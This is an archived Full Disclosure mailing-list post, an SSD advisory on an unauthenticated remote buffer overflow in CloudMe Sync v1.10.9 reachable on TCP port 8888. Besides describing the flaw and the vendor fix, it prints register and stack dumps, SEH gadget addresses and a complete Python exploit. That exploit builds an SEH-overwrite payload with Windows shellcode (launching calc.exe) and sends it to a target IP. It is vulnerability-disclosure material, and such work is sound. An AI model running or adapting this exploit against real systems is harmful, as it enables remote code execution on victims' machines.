lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun, 11 Feb 2018 09:14:01 +0200 From: SecuriTeam SSD <ssd@...ondsecurity.com> To: fulldisclosure@...lists.org Subject: [FD] SSD Advisory – CloudMe Unauthenticated Remote Buffer Overflow Full report: https://blogs.securiteam.com/index.php/archives/3669 Twitter: @SecuriTeam_SSD Weibo: SecuriTeam_SSD The following advisory describes one (1) vulnerability found in CloudMe. CloudMe is “a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content, all files are synchronized between devices.” The vulnerability found is a buffer overflow vulnerability, which when exploited can be used to cause the product to execute arbitrary code. Credit A security researcher from, hyp3rlinx, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program Vendor response The vendor has released CloudMe version 1.11.0 which addresses this vulnerability. Affected version CloudMe Sync version v1.10.9 and prior Vulnerability Details An unauthenticated remote attackers that can connect to the “CloudMe Sync” client application listening on port 8888, can send a malicious payload causing a buffer overflow condition. This will result in an attacker controlling the programs execution flow and allowing arbitrary code execution on the victims PC. CloudMe Sync client creates a socket listening on TCP Port 8888 (0x22B8) In Qt5Core: 00564DF1 . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8 00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX 00564DFC . FF15 B8738100 CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst Buffer overflow condition EIP register will be overwritten at about 1075 bytes. EAX 00000001 ECX 76F698DA msvcrt.76F698DA EDX 00350000 EBX 41414141 ESP 0028D470 EBP 41414141 ESI 41414141 EDI 41414141 EIP 41414141 Stack dump information (508.524): Access violation - code c0000005 (first/second chance not available) *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000 eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? Exploitation is very easy as ASLR SafeSEH are all set to false making the exploit portable and able to work across different operating systems. We will therefore use Structured Exceptional Handler overwrite for our exploit. e.g. 6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll) 00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe) 61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll) Exploit import socket,struct print 'CloudMe Sync v1.10.9' print 'Unauthenticated Remote Buffer Overflow 0day' print 'Discovery/credits: hyp3rlinx' print 'apparition security\n' #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") ip=raw_input('[+] CloudMe Target IP> ') nseh="\xEB\x06"+"\x90"*2 #JMP seh=struct.pack('<L',0x61e7b7f6) #POP,POP RET junk="A"*2232+nseh+seh+sc+"B"*5600 payload=junk+nseh+seh+sc def PwnMe(ip,payload): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip,8888)) s.send(payload) print 'Sending buffer overflow packetz' raw_input() if __name__ == '__main__': PwnMe(ip,payload) _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists